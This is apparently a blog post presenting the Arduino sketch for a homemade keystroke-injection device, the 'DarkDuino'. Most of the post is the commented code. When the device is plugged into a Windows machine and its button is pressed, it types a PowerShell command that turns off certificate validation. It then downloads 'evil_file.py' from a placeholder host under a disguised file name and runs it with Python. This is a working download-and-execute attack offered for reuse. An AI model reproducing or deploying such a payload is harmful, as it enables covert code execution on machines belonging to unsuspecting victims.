The first payload I came up with for the DarkDuino was a simple powershell payload to download a given file off the network and then to execute it. I will co over the code in detail below. This is the main loop in a sketch uploaded to an Arduino Micro Microcontroller. At a high level what happens is, when connected to a target system and pinButton is pressed (brought to GND) the DarkDuino fires off a powershell command to download a python file and execute it. It does assume the network allows local area network traffic on port 80 or 443 if you're using HTTPS (and you should be!). It also assumes that the system has the python executable in it's PATH. here is the commented code:
… cut...
void loop() {
if (!digitalRead(pinButton)) {
digitalWrite(pinLed, HIGH);
//Use the run box quick-keys to open cmd.exe
Keyboard.press(KEY_LEFT_GUI);
Keyboard.print(F("r"));
Keyboard.releaseAll();
delay(1000);
//Open PowerShell to download the file
Keyboard.print(F("powershell
-noprofile "));
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.press(KEY_TAB);
Keyboard.releaseAll()
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
//Enter Download command into PowerShell
Keyboard.print(F("[System.Net.ServicePointManager]::"));
Keyboard.print(F("ServerCertificateValidationCallback = {$true};
"));
//Change the IPADDRESS variable to the FQDN or LAN IP of the system holding
//The payload.
Keyboard.print(F("$source=\"\"\"http://IPADDRESS/evil_file.py\"\"\";
"));
//You can also change the download location here
Keyboard.print(F("$destination=\"\"\"C:\\temp\\update_r34u7.py\"\"\";
"));
//See Red Team Field Manual for the original example of this PS payload
Keyboard.print(F("$http =
new-object System.Net.WebClient; "));
Keyboard.print(F("$response =
$http.DownloadFile($source, $destination);\" "));
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
//Give the program a few seconds to DL the file
then exit PS
delay(3000);
Keyboard.print(F("exit"));
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
//now execute it with Python
Keyboard.print(F("python C:\\temp\\update_r34u7.py"));
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(500);
digitalWrite(pinLed, LOW);
}
}
After I roughed out this sketch, I went back through and re-factored some of the code into methods which shrank the overall size a good bit and makes new payloads easier by modifying a copy of this one. I will write up that code as soon as I am finished testing it. Make sure to check back in the near future.
No comments:
Post a Comment